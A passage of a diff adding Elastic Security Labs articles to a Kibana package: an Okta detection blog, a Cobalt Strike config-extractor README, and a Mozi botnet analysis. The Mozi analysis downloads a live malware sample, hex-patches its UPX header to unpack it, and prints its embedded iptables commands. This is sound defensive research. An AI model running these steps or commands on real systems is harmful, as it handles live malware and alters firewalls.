Log](https://developer.okta.com/docs/reference/api/system-log/) events and ship them to Elasticsearch to be indexed. Okta's System Log records events related to an organization in order to provide an audit trail that can be used to understand platform activity. The Elastic Security Intelligence & Analytics Team has [free rules](https://github.com/elastic/detection-rules/tree/main/rules/okta) to detect suspicious activity in Okta logs and will continue adding more in future.\n\nIn the following example, imagine that an adversary has harvested an API token after gaining initial access to an organization's network. The API token has administrator privileges and the adversary executes some actions in their target's Oka environment:\n\n- Create a new user account and assign administrative permissions to it in order to maintain a presence in the target environment should the security team discover that the current API token is compromised\n- Deactivate a sign-on policy in order to weaken the target's security controls\n- Disable a network zone to enable attackers to authenticate from any geographical location during their intrusion\n\nThe Okta Filebeat module was configured to ship Okta System Log events to Elasticsearch and our Okta rules were activated in Elastic Security. The suspicious activity triggered three alerts shown in Figure 12 below.\n\n\n\nClicking on one of the alerts allows the analyst to review more information about the rule, including the description of the behavior that the rule detects, severity and risk scores, and the associated MITRE ATT&CK® tactic and technique. The analyst can scroll further down the page and begin to investigate the alert in Timeline.\n\nTo learn more how Elastic supports ATT&CK, see our presentation: [How to Plan and Execute a Hunt](https://youtu.be/2Hh5spqA6bw).\n\n\n\nSecurity practitioners know that every organization's network is different. Behavior that looks suspicious in one environment may be benign in another. To help security teams find the proverbial “signal in the noise,” users can add exceptions to their detection rules to filter benign events and continue to alert on suspicious events. Figure 14 shows an exception being added to an Okta rule.\n\n\n\nWe've also introduced the \"threshold\" rule type. Threshold rules aggregate query results and generate an alert when the number of matched events exceeds a certain threshold. The example rule below will generate an alert when 25 Okta user authentication failures occur from a single source IP address. This can be indicative of a brute force or password spraying attack.\n\n\n\nViewing an alert generated by a threshold rule in the Timeline allows an analyst to review the events that triggered the rule and begin their triage process or investigation.\n\n\n\n## Conclusion\n\nAccording to Verizon's latest [Data Breach Investigations Report](https://enterprise.verizon.com/resources/reports/dbir/), cloud assets were involved in 24% of the report's 3,950 data breaches reviewed last year. As organizations continue to migrate their data and business operations to the cloud, we can expect this number to increase.\n\nIn this blog post, we discussed some of the challenges that security teams face when attempting to monitor for, detect, and investigate suspicious behavior in their organization's cloud environments. We walked through some practical examples on how attackers operate in cloud environments and how Elastic Security can detect those techniques.\n\nThe Elastic Security Intelligence & Analytics Team researches adversary tradecraft and develops new detection rules and machine learning jobs for multiple platforms including cloud. Our users can expect to see our continued focus on increasing the cost of cloud attacks.\n\nConfiguring our [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) to ship logs to Elasticsearch and enable detection rules in Elastic Security is easy. Our [free detection rules](https://github.com/elastic/detection-rules) help security teams monitor those logs and detect suspicious behavior, regardless of the size of their team. Elastic Security enables analysts to triage and investigate those alerts quickly and efficiently.\n\nIf you're interested in learning more about Elastic Security, you can [download it for free](https://www.elastic.co/security) or sign up for a free 14-day trial of [Elastic Cloud](https://www.elastic.co/cloud/).\n"
+ },
+ "title": "Security operations: Cloud monitoring and detection with Elastic Security",
+ "slug": "cloud-monitoring-and-detection-with-elastic-security",
+ "date": "2022-11-30",
+ "description": "As companies migrate to cloud, so too do opportunist adversaries. That's why our Elastic Security team members have created free detection rules for protecting users' cloud platforms like AWS and Okta. Learn more in this blog post.",
+ "author": [
+ {
+ "slug": "brent-murphy"
+ },
+ {
+ "slug": "david-french"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-network-attack-map.jpg",
+ "category": null
+ },
+ "id": "security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cobalt_strike_beacon_extractor-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cobalt_strike_beacon_extractor-md.json
new file mode 100644
index 00000000000..abf4c519743
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cobalt_strike_beacon_extractor-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Cobalt Strike Beacon Extractor\"\nslug: \"cobalt-strike-beacon-extractor\"\ndate: \"2022-12-06\"\ndescription: \"Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.\"\nauthor:\n - slug: elastic-security-labs\nimage: \"tools-image.jpg\"\ncategory:\n - slug: tools\ntags:\n - cobaltstrike\n---\n\nPython script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.\n\n[Download cobalt-strike-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdbc4f9f2366d2f06/628829603b9b8554904a4ba2/cobalt-strike-extractor.tar.gz)\n\n## Overview\n\nThis tool provides a Python module and command line tool that will search Elastic Endpoint alert data for detections of Cobalt Strike and the extracted memory data. When present, this tool will extract the implant configuration using the [cobaltstrike-config-extractor](https://github.com/strozfriedberg/cobaltstrike-config-extractor). The information is then normalized into an ECS-formatted JSON document and indexed into an Elasticsearch cluster or output to the terminal as JSON.\n\n> For help on creating Fleet policies to collect and analyze Cobalt Strike beacons in the Elastic Stack, check out our blog posts detailing this:\n>\n> - [Collecting Colbalt Strike beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack)\n> - [Extracting Cobalt Strike beacon configurations](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations)\n\n## Getting Started\n\n### Docker\n\nThe recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.\n\n```\ndocker build . -t cobalt-strike-extractor\n```\n\nNext, make a copy of config.reference.yml and name it config.local.yml and edit for your environment. A minimal config looks like the example below. The input and output could use the same values, but you can optionally push it to a different cluster for analysis.\n\n```\n## Using an Elastic Cloud instance (this is a randomly generated example)\ninput.elasticsearch:\n enabled: True\n cloud.id: security-cluster:dXMtd2VzdDEuZ2NwLmNsb3VkLmVzLmlvJGU0MWU1YTc3YmRjNzY2OTY0MDg2NjIzNDA5NzFjNjFkJDdlYjRlYTJkMzJkMTgzYTRiMmJkMjlkNTNjODhjMjQ4\n cloud.auth: elastic:\n\n## Default output will use localhost:9092, see reference config\noutput.elasticsearch:\n enabled: True\n username: elastic\n password: \n\n```\n\nNow, run the container, passing in our local configuration. The -v flag here will add informational messages to the log output. Here, it tells us how many documents were successfully parsed and written.\n\n```\ndocker run -ti --rm -v \"$(pwd)/config.local.yml:/config.yml\" \\\n cobalt-strike-extractor:latest -c /config.yml -v\n\n```\n\n_Output_:\n\n```\n[2022-01-10T21:33:31.493][INFO] Setting up input/output\n[2022-01-10T21:33:31.493][INFO] Connecting to Elasticsearch for input\n[2022-01-10T21:33:31.493][INFO] Successfully connected to Elasticsearch for input\n[2022-01-10T21:33:31.834][INFO] Connecting to Elasticsearch for output\n[2022-01-10T21:33:31.835][INFO] Successfully connected to Elasticsearch for output\n[2022-01-10T21:33:33.030][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.078][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.093][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.096][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.097][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.098][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.186][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.191][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.461][WARNING] Could not parse source as PE file (DOS Header magic not found.)\n[2022-01-10T21:33:33.516][WARNING] CobaltStrike Beacon config not found:\n[2022-01-10T21:33:33.927][INFO] Wrote 2 docs to Elasticsearch\n\n```\n\nThe [WARNING] messages here are to be expected. These are simply source documents that didn’t contain the configuration information.\n\n#### Filter by time\n\nTo limit the search by time frame, you can add the --since argument, which takes either an ISO-formatted date time string or you can use [Elastic date math](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-range-query.html#ranges-on-dates). For example, to limit search to the last 30 days, you can do the following.\n\n```\ndocker run -ti --rm -v \"$(pwd)/config.local.yml:/config.yml\" \\\n cobalt-strike-extractor:latest --since \"now-30d/d\" -c config.local.yml\n\n```\n\n#### Pipe output to other tools\n\nLastly, you can pipe the output to other commands, such as jq to do local analysis. You can also override the configuration file values using environment variables.\n\n```\ndocker run -i --rm -a stdin -a stdout -a stderr \\\n -v \"$(pwd)/config.local.yml:/config.yml\" \\\n -e \"OUTPUT_ELASTICSEARCH_ENABLED=False\" \\\n -e \"OUTPUT_CONSOLE_ENABLED=True\" cobalt-strike-extractor:latest -c /config.yml -q | jq '.cobaltstrike.server.hostname'\n\n```\n\nIn the example above, we disabled the Elasticsearch output and enabled the Console output using environment variables. We made the output more quiet using the -q flag (hiding the warnings). Then, we used jq to just pull out the “hostname” value of the configuration.\n\n### Running it Locally\n\nAs mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.\n\n```\npoetry lock\npoetry install\npoetry shell\ncobalt-strike-extractor --help\n\n```\n\nOnce that works, you can do the same sort of things as mentioned in the Docker instructions above.\n"
+ },
+ "title": "Cobalt Strike Beacon Extractor",
+ "slug": "cobalt-strike-beacon-extractor",
+ "date": "2022-12-06",
+ "description": "Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.",
+ "author": [
+ {
+ "slug": "elastic-security-labs"
+ }
+ ],
+ "image": "tools-image.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "cobaltstrike"
+ ]
+ },
+ "id": "security_labs_content-cobalt_strike_beacon_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md.json
new file mode 100644
index 00000000000..5811a5d2ded
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-collecting_and_operationalizing_threat_data_from_the_mozi_botnet-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Collecting and operationalizing threat data from the Mozi botnet\"\nslug: \"collecting-and-operationalizing-threat-data-from-the-mozi-botnet\"\ndate: \"2022-06-02\"\ndescription: \"The Mozi botnet is an ongoing malware campaign targeting unsecured and vulnerable networking devices. This post will showcase the analyst journey of collecting, analyzing, and operationalizing threat data from the Mozi botnet.\"\nauthor:\n - slug: andrew-pease\n - slug: seth-goodwin\n - slug: derek-ditch\n - slug: daniel-stepanic\nimage: \"blog-thumb-mozi-botnet.jpg\"\ncategory:\n - slug: security-research\n---\n\nDetecting and preventing malicious activity such as botnet attacks is a critical area of focus for threat intel analysts, security operators, and threat hunters. Taking up the Mozi botnet as a case study, this blog post demonstrates how to use open source tools, analytical processes, and the Elastic Stack to perform analysis and enrichment of collected data irrespective of the campaign. This will allow you to take the lessons and processes outlined below to your organization and apply them to your specific use cases.\n\nThe Mozi botnet has been leveraging vulnerable Internet of Things (IoT) devices to launch campaigns that can take advantage of the force multiplication provided by a botnet (Distributed Denial of Service (DDoS), email spam, brute-force, password spraying, etc.). Mozi was [first reported](https://blog.netlab.360.com/mozi-another-botnet-using-dht/) by the research team at 360Netlab in December 2019 and has continued to make up a large portion of IoT network activity across the Internet-at-large.\n\nAs reported by 360Netlab, the botnet spreads via the use of weak and default remote access passwords for targeted devices as well as through multiple public exploits. The Mozi botnet communicates using a Distributed Hash Table (DHT) which records the contact information for other nodes in the botnet. This is the same serverless mechanism used by file sharing peer-to-peer (P2P) clients. Once the malware has accessed a vulnerable device, it executes the payload and subsequently joins the Mozi P2P network. The newly infected device listens for commands from controller nodes and also attempts to infect other vulnerable devices.\n\nMozi targets multiple IoT devices and systems, mainly focused on Small Office Home Office (SOHO) networking devices, Internet-connected audio visual systems, and theoretically any 32-bit ARM device.\n\n## Collection\n\nWhen performing data analysis, the more data that you have, the better. Analysis of malware campaigns are no different. With a paid subscription to VirusTotal, you can collect huge amounts of data for analysis, but we wanted an approach for independent researchers or smaller organizations that may not have this premium service. To do that, we decided to keep to our roots at Elastic and leverage open source datasets to avoid a paywall that could prevent others from using our processes.\n\nTo begin, we started with a handful of [Mozi samples](https://threatfox.abuse.ch/browse.php?search=tag%3Amozi) collected from [ThreatFox](https://threatfox.abuse.ch/). ThreatFox is an open source platform from [Abuse.ch](https://abuse.ch) with the goal of sharing malware indicators with the security research community.\n\nUsing cURL, we queried the ThreatFox API for the Mozi tag. This returned back JSON documents with information about the malware sample, based on the tagged information.\n\n```\ncurl -X POST https://threatfox-api.abuse.ch/api/v1/ -d '{ \"query\": \"taginfo\", \"tag\": \"Mozi\", \"limit\": 1 }'\n```\n\n_Code block 1 - cURL request to ThreatFox API_\n\n- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the ThreatFox API\n- `https://threatfox-api.abuse.ch/api/v1/` - this is the ThreatFox API endpoint\n- -d - this is denoting that we’re going to be sending data\n- query: taginfo - the type of query that we’re making, taginfo in our example\n- tag: Mozi - the tag that we’ll be searching for, “Mozi” in our example\n- limit: 1 - the number of results to return, 1 result in our example, but you can return up to 1000 results\n\nThis returned the following information:\n\n```\n{\n \"query_status\": \"ok\",\n \"data\": [\n {\n \"id\": \"115772\",\n \"ioc\": \"nnn.nnn.nnn.nnn:53822\",\n \"threat_type\": \"botnet_cc\",\n \"threat_type_desc\": \"Indicator that identifies a botnet command&control server (C&C)\",\n \"ioc_type\": \"ip:port\",\n \"ioc_type_desc\": \"ip:port combination that is used for botnet Command&control (C&C)\",\n \"malware\": \"elf.mozi\",\n \"malware_printable\": \"Mozi\",\n \"malware_alias\": null,\n \"malware_malpedia\": \"https:\\/\\/malpedia.caad.fkie.fraunhofer.de\\/details\\/elf.mozi\",\n \"confidence_level\": 75,\n \"first_seen\": \"2021-06-15 08:22:52 UTC\",\n \"last_seen\": null,\n \"reference\": \"https:\\/\\/bazaar.abuse.ch\\/sample\\/832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b\\/\",\n \"reporter\": \"abuse_ch\",\n \"tags\": [\n \"Mozi\"\n ]\n }\n ]\n```\n\n_Code block 2 - Response from ThreatFox API_\n\nNow that we have the file hashes of several samples, we can download the samples using the Malware Bazaar API. Malware Bazaar is another open source platform provided by Abuse.ch. While ThreatFox is used to share contextual information about indicators, Malware Bazaar allows for the actual collection of malware samples (among other capabilities).\n\nJust like with ThreatFox, we’ll use cURL to interact with the Malware Bazaar API, but this time to download the actual malware samples. Of note, the Malware Bazaar API can be used to search for samples using a tag (“Mozi”, in our example), similar to how we used the ThreatFox API. The difference is that the ThreatFox API returns network indicators that we’ll use later on for data enrichment.\n\n```\ncurl -X POST https://mb-api.abuse.ch/api/v1 -d 'query=get_file&sha256_hash=832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b' -o 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw\n```\n\n_Code block 3 - cURL request to Malware Bazaar API_\n\n- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the Malware Bazaar API\n- `https://mb-api.abuse.ch/api/v1` - this is the Malware Bazaar API endpoint\n- -d - this is denoting that we’re going to be sending data\n- query: get_file - the type of query that we’re making, get_file in our example\n- sha256_hash - the SHA256 hash we’re going to be collecting, “832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b” in our example\n- -o - the file name we’re going to save the binary as\n\nThis will save a file locally named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw. We want to make a raw file that we’ll not modify so that we always have an original sample for archival purposes. This downloads the file as a Zip archive. The passphrase to extract the archive is infected. This will create a local file named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.elf. Going forward, we’ll use a shorter name for this file, truncated-87d3b.elf, for readability.\n\n### Unpacking\n\nNow that we have a few samples to work with we can look at ripping out strings for further analysis. Once in our analysis VM we took a stab at running [Sysinternals Strings](https://docs.microsoft.com/en-us/sysinternals/downloads/strings) over our sample:\n\n```\n$ strings truncated-87d3b.elf\nELF\n*UPX!\nELF\n$Bw\n(GT\n...\n```\n\n_Code block 3 - Strings output from the packed Mozi sample_\n\nRight away we see that we have a [UPX](https://upx.github.io/) packed ELF binary from the “ELF” and “UPX!” text. UPX is a compression tool for executable files, commonly known as “packing”. So the next logical step is to decompress the ELF file with the UPX program. To do that, we’ll run upx with the -d switch.\n\n```\n$ upx -d truncated-87d3b.elf\n Ultimate Packer for eXecutables\n Copyright (C) 1996 - 2020\nUPX 3.96w Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020\n File size Ratio Format Name\n -------------------- ------ ----------- -----------\nupx.exe : upx: truncated-87d3b.elf : CantUnpackException: p_info corrupted\n```\n\n_Code block 4 - UPX output from corrupted Mozi sample_\n\nAnother road-block: the p_info section of the file appears to be corrupted. p_info is the sum of two sections from a file, p_blocksize and p_filesize . After a quick search for the error message, we landed on a [CUJOAI Anti-Unpacking blog](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/) explaining the header corruptions commonly used in IoT malware to disrupt automated analysis tools.\n\nUsing this information, we cracked open our binary in [xxd](https://linux.die.net/man/1/xxd), a HEX dumper, to see which corruption we were dealing with. As described in the CUJOAI blog, the p_info blocks represent the sum of the p_filesize blocks and the p_blocksize blocks. This section begins with the 8 bytes after the UPX! text, and has been overwritten with zeros (the 8 bytes starting at 0x84 ).\n\n```\n$ xxd truncated-87d3b.elf\n00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000 .ELF...a........\n00000010: 0200 2800 0100 0000 1057 0200 3400 0000 ..(......W..4...\n00000020: 0000 0000 0202 0000 3400 2000 0200 2800 ........4. ...(.\n00000030: 0000 0000 0100 0000 0000 0000 0080 0000 ................\n00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000 ................\n00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600 .........z......\n00000060: b0fa 0600 0000 0000 0000 0000 0600 0000 ................\n00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17 .......RUPX!....\n00000080: 0000 0000 0000 0000 0000 0000 9400 0000 ................\n00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261 ^.........ELF.ra\n000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07 ....(........4..\n000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009 .(...... .......\n...\n```\n\n_Code block 5 - HEX view of the corrupted Mozi sample_\n\nThe CUJOAI blog states that if you manually update the values of the p_filesize blocks and the p_blocksize blocks with the value of the p_info, this will fix the corruption issue. Below we can see the p_info section in HEX, and we can use that to manually update the p_filesize and p_blocksize sections, which will allow us to unpack the binary (the 4 bytes starting at 0x1e110).\n\n```\n$ xxd truncated-87d3b.elf\n...\n0001e0c0: 1914 a614 c998 885d 39ec 4727 1eac 2805 .......]9.G'..(.\n0001e0d0: e603 19f6 04d2 0127 52c9 9b60 00be 273e .......'R..`..'>\n0001e0e0: c00f 5831 6000 0000 0000 90ff 0000 0000 ..X1`...........\n0001e0f0: 5550 5821 0000 0000 5550 5821 0d17 0308 UPX!....UPX!....\n0001e100: 5199 6237 591c 321c d001 0000 b800 0000 Q.b7Y.2.........\n0001e110: 7c2a 0400 5000 0011 8000 0000 |*..P.......\n```\n\n_Code block 6 - p_info HEX data from the corrupted Mozi sample_\n\nFirst, let’s open the file with Vim. As we can see, it is just a UPX file as denoted by the UPX!.\n\n```\n$ vim truncated-87d3b.elf\n^?ELF^A^A^Aa^@^@^@^@^@^@^@^@^B^@(^@^A^@^@^@^PW^B^@4^@^@^@^@^@^@^@^B^B^@^@4^@ ^@^B^@(^@^@^@^@^@^A^@^@^@^@^@^@^@^@<80>^@^@^@<80>^@^@^Mà^A^@^Mà^A^@^E^@^@^@^@<80>^@^@^A^@^@^@°z^@^@°ú^F^@°ú^F^@^@^@^@^@^@^@^@^@^F^@^@^@^@<80>^@^@^Pñ<8f>RUPX!^\\\n```\n\n_Code block 7 - Corrupted Mozi sample in Vim_\n\nUsing the xxd plugin for Vim, we can convert this to HEX so that we can make our modifications. This is achieved by typing :%!xxd, which will show us the HEX output for the file.\n\n```\n00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000 .ELF...a........\n00000010: 0200 2800 0100 0000 1057 0200 3400 0000 ..(......W..4...\n00000020: 0000 0000 0202 0000 3400 2000 0200 2800 ........4. ...(.\n00000030: 0000 0000 0100 0000 0000 0000 0080 0000 ................\n00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000 ................\n00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600 .........z......\n00000060: b0fa 0600 0000 0000 0000 0000 0600 0000 ................\n00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17 .......RUPX!....\n00000080: 0000 0000 0000 0000 0000 0000 9400 0000 ................\n00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261 ^.........ELF.ra\n000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07 ....(........4..\n000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009 .(...... .......\n```\n\n_Code block 8 - Corrupted Mozi sample in Vim with XXD plugin_\n\nNext, we can just update bytes 0x84 - 0x8b(that we identified as having the zero’d out p_filesize and p_blocksize) with the HEX value for p_info (7c2a 0400).\n\n```\n00000080: 0000 0000 7c2a 0400 7c2a 0400 9400 0000 ....|*..|*......\n```\n\n_Code block 9 - Updated p_filesize and p_blocksize HEX values_\n\nLet’s reset the file back using :%!xxd -r, save the file and exit Vim (:wq).\n\nFinally, let’s try to unpack the file now that we’ve manually adjusted the HEX values.\n\n```\n$ upx -d truncated-87d3b.elf\n Ultimate Packer for eXecutables\n Copyright (C) 1996 - 2020\nUPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020\n File size Ratio Format Name\n -------------------- ------ ----------- -----------\n 273020 <- 123165 45.11% linux/arm truncated-87d3b.elf\nUnpacked 1 file.\n```\n\n_Code block 10 - Successfully unpacked Mozi sample_\n\nWe now have successfully unpacked the file. Let’s check to see what kind of file this is now by using the file command.\n\n```\n$ file truncated-87d3b.elf\ntruncated-87d3b.elf: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped\n```\n\n_Code block 11 - File type identification of the Mozi sample_\n\nNow, we can again use the strings command to see if there is any useful information that we can use (truncated for readability).\n\n```\n$ strings truncated-87d3b.elf\n...\niptables -I OUTPUT -p udp --source-port %d -j ACCEPT\niptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT\niptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT\niptables -I INPUT -p udp --dport %d -j ACCEPT\niptables -I OUTPUT -p udp --sport %d -j ACCEPT\niptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT\niptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT\n0.0.0.0\n[idp]\nThis node doesn't accept announces\nv2s\ndht.transmissionbt.com:6881\nrouter.bittorrent.com:6881\nrouter.utorrent.com:6881\nbttracker.debian.org:6881\nnnn.nnn.nnn.nnn:6881\nabc.abc.abc.abc:6881\nxxx.xxx.xxx.xxx:6881\nyyy.yyy.yyy.yyy:6881\nNfZ\nOo~Mn\ng5=\nN]%\nRange: bytes=\nUser-Agent:\n...\n```\n\n_Code block 12 - Strings output from the unpacked Mozi sample_\n\nRunning Strings, we can see, among other things, network indicators and changes to the local firewall, iptables. There is a lot of great information in this file that we can now review which can be used to search for infected devices.\n\nNext, let’s enrich the ThreatFox data, store it in Elasticsearch, and visualize it with Kibana.\n\n## Storing threat data in the Elastic Stack\n\nLooking at what we’ve collected so far, we have rich threat data provided by ThreatFox that includes both network and file information. Additionally, we have actual malware samples collected from Malware Bazaar. Finally, we have performed static file analysis on the malware to identify additional indicators that could be of use.\n\nFor the next steps, we’re going to parse the data from ThreatFox and store that in the Elastic Stack so that we can leverage Kibana to visualize data to identify clusters of activity.\n\n## Create the Ingest Node Pipeline\n\nWe're going to create an Ingest Node Pipeline to transform the data from ThreatFox into enriched Elasticsearch data. When making a pipeline, it's useful to make a table to lay out what we're going to do.\n\n| | |\n| ---------------------------- | --------------------------------------------------------------- |\n| ThreatFox field | ECS-style field |\n| id | event.id |\n| ioc | threat.indicator.ip and threat.indicator.port |\n| threat_type | threat.software.type |\n| threat_type_desc | threat.indicator.description |\n| ioc_type | threat.indicator.type. Set threat.indicator.type to \"ipv4-addr\" |\n| malware | threat.software.name |\n| malware_printable | threat.threatfox.malware_printable |\n| malware_alias | threat.software.alias (if non-null) |\n| malware_malpedia | threat.software.reference |\n| confidence_level | threat.indicator.confidence |\n| first_seen | threat.indicator.first_seen |\n| last_seen | threat.indicator.last_seen |\n| reference | event.reference |\n| reporter | event.provider |\n| tags | tags |\n| `` | threat.indicator.geo. Enriched by our geoip processor. |\n| `` | file.hash.sha256 and related.hash |\n| `` | related.ip |\n\n_Table 1 - Elasticsearch Ingest Node Pipeline for ThreatFox data_\n\nTo create the pipeline, go to **Kibana Stack Management** -> **Ingest Node Pipelines** , then click **Create pipeline**.\n\n\n\nNext, we’ll give our pipeline a name, optionally a version, and a description.\n\nFrom this view you can manually add processors and configure them to your liking. To give you a head start, we've provided the [ThreatFox pipeline definition here](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json) you can paste in.\n\nClick **Import processors** and paste the contents of this pipeline definition: [pipeline.json](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json).\n\nWhen you click **Load and overwrite** , you'll have each processor listed there as we've configured it. From here you can tweak it to your needs, or just scroll down and click **Create pipeline**.\n\n\n\nAlternatively, if you’d like to use a turnkey approach, the [collection.sh](https://github.com/elastic/examples/blob/master/blog/mozin-about/collection.sh) script will allow you to collect the ThreatFox Mozi data, create the Elasticsearch ingest pipeline, the indicators Index, the Index Pattern, and send the data from ThreatFox directly into Elasticsearch.\n\n```\n$ git clone https://github.com/elastic/examples\n$ cd examples/blog/mozin-about\n$ sh collection.sh\n```\n\n_Code block 13 - Using the Mozi sample collection script_\n\nUsing the provided collection script, we can see the Threat Fox data is converted into the Elastic Common Schema (ECS) and sent to Elasticsearch for analysis.\n\n\n\n_Figure 3 - ThreatFox data in Kibana_\n\n## Analysis\n\nNow that we’ve collected our samples, enriched them, and stored them in Elasticsearch, we can use Kibana to visualize this data to identify clusters of activity, make different observations, and set up different pivots for new research.\n\nAs a few quick examples, we can identify some ports that are used and countries that are included in the dataset.\n\nLet’s start with identifying high-density network ports. Make a Lens visualization in Kibana by clicking on **Visualization Library** → **Create visualization** → **Lens**. We can make a simple donut chart to highlight that the threat.indicator.port of 6000 makes up over 10% of the network ports observed. This could lead us to explore other network traffic that is using port 6000 to identify other potentially malicious activity.\n\n\n\nOf note, port 0 and 4000 are also observed and are interesting. Ports 6000, 4000, nor 0 are overly common on the Internet-at-large and could be used to identify other compromised hosts. It should be noted that while transient network indicators like IP and port are useful, they should not be used as the sole source to identify malicious activity irrespective of the intrusion set being investigated.\n\nNext, we can use a Kibana Maps visualization to identify geographic clusters of activities, and include associated context such as indicator confidence, provider, and type.\n\n\n\nSimilar to the commentary above on IP and ports, geographic observations should not be the sole source used to take action. These are simply indicators for observed samples and require organizational-centric analysis to ascertain their meaning as it relates to the specific network.\n\nThis is useful information we can make the following analytical assertions based on our sampling:\n\n- Mozi botnet is currently active and maintaining steady infection rates\n- Port 6000 is a dominant port used for command & control\n- At least 24 countries impacted suggests global threat with no specific targeting\n- Clusters of specific ASNs in Bulgaria and India stand out with highest volumes\n\nAs the analysis process starts to flow, it ends up providing additional avenues for research. One example an analyst may pursue is a propagation mechanism through the use of HTTP fingerprinting.\n\n## Exploring the propagation mechanism\n\nIn the same manner as criminal fingerprints are tracked and logged in a database, a similar technique can be applied to publicly facing network infrastructure. An HTTP request can be sent to a webserver and the HTTP response that is returned can be used to identify possible web applications hosted on the server; even the ordering of the fields in the HTTP response can be used as an identifier.\n\nOne thing we learned about Mozi and how it contributes to its spreading power is that each compromised device contributes to the infection of future victims. The compromised device starts an HTTP server that hosts a Mozi payload on a random TCP port. Knowing this information, we can collect content from an infected system to generate a fingerprint using cURL.\n\n```\ncurl -I nnn.nnn.nnn.nnn:53822\nHTTP/1.1 200 OK\nServer: nginx\nContent-Length: 132876\nConnection: close\nContent-Type: application/zip\n```\n\n_Code block 14 - HTTP response from a compromised device_\n\nBased on the observed response back, we can pull back some interesting information such as:\n\n- The use of an NGINX web server\n- No HTTP Date Header provided\n- The size of the file returned is close to 133 kilobytes\n\nWith this small amount of data, we can pivot to different search engines that store response data from these kinds of devices all over the world. By leveraging tools like [Shodan](https://www.shodan.io/), we can perform a search using the information obtained in the HTTP response. We’ll wildcard the Content-Length but use the same order for all of the HTTP response elements:\n\n```\nHTTP/1.1 200 OK Server: nginx Content-Length: * Connection: close Content-Type: application/zip\n```\n\n_Code block 15 - HTTP header for Mozi propagation_\n\nWe can see a number of hits where this same response was captured on other devices and start to pinpoint additional machines. Below are a few examples from a Shodan 